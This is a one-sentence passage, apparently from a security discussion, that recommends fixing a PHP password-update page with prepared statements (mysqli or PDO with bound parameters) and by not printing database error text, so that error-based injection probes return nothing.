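For the PHP on the page the equivalent fix is a prepared statement (mysqli or PDO with a bound parameter for the new password) and never printing the driver's error text to the response, since a silent failure gives the error-based probes nothing to read.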